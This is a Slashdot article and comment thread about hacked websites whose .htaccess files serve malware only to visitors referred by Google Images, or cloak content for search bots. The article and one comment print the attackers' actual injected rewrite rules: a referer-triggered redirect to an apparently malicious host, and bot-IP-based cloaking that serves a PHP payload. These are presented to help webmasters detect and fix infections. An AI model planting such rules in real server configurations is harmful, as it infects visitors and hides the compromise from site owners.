Forgot your password?

typodupeerror
Security The Internet

Image Searchers Snared By Malware 144

Posted by samzenpus
from the caught-in-the-net dept.
Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.

A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?

It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com

then the normal page would be returned. But if you entered these commands:

GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/

then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.

(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:

GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/

So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)

Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)

Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)

Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.

This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)

Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>

which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)

It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.

And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?

This discussion has been archived. No new comments can be posted.

Image Searchers Snared By Malware

Comments Filter:
  • by Itninja (937614) on Thursday February 04 2010, @11:46AM (#31022918) Homepage
    For all that are hypersensitive to misspellings. The term 'referer' is not [wikipedia.org] a typo (at least, not in this article).
  • Re:This hurts.... (Score:5, Informative)

    by HTH NE1 (675604) on Thursday February 04 2010, @12:06PM (#31023176)

    Just yesterday, when searching for "LEGO Mohammad", NoScript noted a clickjacking attempt when I tried to right-click an image while in the Google Images frame, but not when I unframed it, so yeah, NoScript seems to catch it.

  • Re:lol (Score:2, Informative)

    by goofyspouse (817551) on Thursday February 04 2010, @12:18PM (#31023344)
    That you are 2 for 2 this morning? *grin*

    FWIW, I prefer "irradiated". That would kill them AND the cooties they carry.
  • We got hit by this (Score:5, Informative)

    by hedronist (233240) * on Thursday February 04 2010, @12:47PM (#31023700)

    We get so many 404s because of probes from random script kiddies that I tend to ignore that part of the daily log scan -- big mistake. (I have my own link checker so I know that all of the real URLs are correct and functioning.) It wasn't until the site owner said that we seemed to have dropped off the search results at Google that we knew something was wrong. I couldn't figure out why and spent quite a bit of time banging my head against random walls.

    Although I had looked at the logs I was mostly looking for 500 errors. I finally started to focus on the 404s and little bells started going off when I saw a whole bunch of them for msnbot. And then I saw a whole bunch for googlebot. And then I noticed that they were all under our /media path. I immediately started checking all of the URLs that had 404ed and they all worked fine. Google was also reporting that they were getting a 404 on our sitemap.xml. Shit! I tested it with their 'Test you URL' page and it worked, so I resubmitted it and ... it 404ed! WTF? (I'm still not sure why this got snarled with sitemap.xml, but it was involved.)

    I went and took a long, hot shower -- this is my place of refuge and deep thinking. The question was: what could cause all of these errors for the spider-bots, but not produce them for me or any normal human? I looked like a prune by the time it hit me: they weren't seeing the same pages/files I was. How could that happen? If this was a networking problem it would already be smelling like a firewall issue of some sort -- the unseen middleman.

    I should mention here that this is a Django site, which means I'm pretty much all over the URLs coming in ... except for /media, which are handled directly by Apache as static files. Apache ... hmmm ... !

    Apache's .htaccess file is probably the single most powerful file on your website, and you don't even see it when you do an 'ls'. I popped into the editor and I almost crapped my pants:

    RewriteCond %{HTTP_HOST} (^|www.)example.com
    RewriteCond %{REQUEST_FILENAME} ![^a-zA-Z0-9](css|js|jpe?g|gif|png|zip|swf|doc|xls|pdf|ico|tar|gz|bmp|rar|mp3|avi|mpeg|flv)(\?|$)
    RewriteCond %{REMOTE_ADDR} ^66\.249\.[6-9][0-9]\.[0-9]+$ [OR]
    RewriteCond %{REMOTE_ADDR} ^74\.125\.[0-9]+\.[0-9]+$
    RewriteCond %{REMOTE_ADDR} ^64\.233\.1[6-9][0-9]\.[0-9]+$ [OR]
    RewriteCond %{REMOTE_ADDR} ^65\.5[2-5]\.[0-9]+\.[0-9]+$ [OR]
    RewriteCond %{HTTP_USER_AGENT} (google|msnbot)
    RewriteRule ^(.*)$ pop/media/images/07_22/7_22-5.class.php [L]

    Those address ranges, btw, are all for googlebot and msnbot, so this only fires if you are coming from one of those net blocks. The special google URL checker wasn't coming from one of those addresses which is why it worked.

    The scary thing is that this code is correct except for one little detail. The bots were getting 404s because the Black Hats got the path wrong. This isn't a normal PHP site and the topmost directory contains all of the Django stuff in one branch and all of the media in a different branch. Apache sees that topmost directory and it's where the .htaccess file lives, but the master .conf file has a specific <Location> rule that maps directly to /media, not /pop/media. If they had not made that error I don't know how long it would have taken to uncover this.

    We still don't know how they got in. We changed all of the passwords and double-checked that we were up to date on all of the server code. There also are multiple levels of tripwires in place now so I'll know about any changes within minutes of it happening. And now we wait . . . .

  • by CoffeePlease (596791) on Thursday February 04 2010, @01:01PM (#31023848) Homepage
    If you run insecure web apps, they can use http injection to write to your .htaccess file. See my post on how I fixed my own site after one of these attacks. http://thedesignspace.net/MT2archives/000505.html [thedesignspace.net]
  • Re:Should Be Shot (Score:2, Informative)

    by Spyware23 (1260322) on Thursday February 04 2010, @01:08PM (#31023938) Homepage

    Covered in the Q&A on NoScript's page: http://noscript.net/faq#qa2_6 [noscript.net].

    The answer Maone gives is detailed, and contains a few "fixes" for your on-your-tit-getting.

  • Re:Should Be Shot (Score:3, Informative)

    by AliasMarlowe (1042386) on Thursday February 04 2010, @01:29PM (#31024216) Journal

    I'll just throw a couple of links at you and then you can go be scared.
    http://ha.ckers.org/weird/javascriptless-port-scanning.cgi [ckers.org], http://ha.ckers.org/weird/CSS-history.cgi [ckers.org].

    Well, I just visited both of your links, and am unimpressed and unscared.

    The CSS history one gave a very short list of what looked like guessed web sites which were mostly wrong (hint: I never visit msn or ebay or myspace, and it's months since I visited yahoo). It looked like blind guesswork, as the list had google, but not slashdot, for instance. Clicking through to see what information they claim to have logged, I encountered an empty list, not even the bogus guesses of wrong web sites that were on the initial page.

    The port scanning page also gave a rather short list of all wrong IPs and one IP:port combo (hint: my LAN is not on 192.168.0.* or 192.168.1.*). Clicking through for the logged information, it just repeated the same set of all-wrong crap that was on the initial page. The only entry which was close to being plausible was 127.0.0.1:8080, since that IP obviously exists. However I have nothing on port 8080, and trying to visit that address just gives a "could not connect" error...

    Please elaborate on why I should be scared.

  • Re:orly? (Score:3, Informative)

    by swb (14022) on Thursday February 04 2010, @01:37PM (#31024342)

    Incredibly common bordering on likely the outright majority.

    For one, its likely that most companies will have some kind of Windows infrastructure and/or Windows application requirements and thus will hand out Windows based laptops/desktops. Admins with a OSS religious affiliation may end up overwriting these systems with Linux or building their own in parallel, but controls/obstacles/requirements/misc bureaucratic bullshit may stop all but the most senior from being able to do this or make it too much of a headache.

    I know someone whose job basically to run an RS/6000 and its application and he is required to use the Windows laptop he was given for some security/accountability purposes, and then there's the office toolchain requirements (Outlook), and then there's the UNIX support applications (all Windows based).

    And then there's sheer inertia. You can't swing your fist without hitting a Windows PC and it generally works with all the hardware, provides windowing and a GUI interface and makes even character-mode UNIX management pretty easy via putty, cut/paste, etc. Plus a lot of server apps (eg, Samba) have functional web GUIs of their own.

    Add in the occasionally hairpulling effort of getting all the hardware/graphics to work right on new laptops under Unix OSes and you can see how someone might just not care what the local video/keyboard platform was for working with a remote server.

  • by xandroid (680978) <xandroid+slashdot@ g m a i l .com> on Thursday February 04 2010, @02:32PM (#31025076) Homepage Journal

    If your site is on a shared server, it may be the case that another user of the server got hacked (or is malicious in the first place) and was able to access your files. In this case, it's a very good idea to notify your host that your files have been messed with.

    Something you may consider: make a backup of a known-good .htaccess, and set up a cronjob to `diff --brief` the two frequently and email you if they're not the same. I've done this with a list of all the PHP files in my account on a shared server:

    7 */4 * * * cd $HOME; find . -name *.php >tmp.phpfiles.txt; if [[ -n "$(diff --brief tmp.phpfiles.txt phpfiles.txt)" ]]; then diff tmp.phpfiles.txt phpfiles.txt | mail -s "new PHP files" YOUR@EMAIL.ADDRESS; fi; rm tmp.phpfiles.txt

  • Re:Should Be Shot (Score:3, Informative)

    by Philip_the_physicist (1536015) on Thursday February 04 2010, @09:42PM (#31029944)

    That list is the sites being tested, if it can detect any of them in your history, it shows red text in a box next to that item. The exploit can only check a specific list of items. The problem is a UI/implementation one, not a problem with the concept.

Space is to place as eternity is to time. -- Joseph Joubert

Working...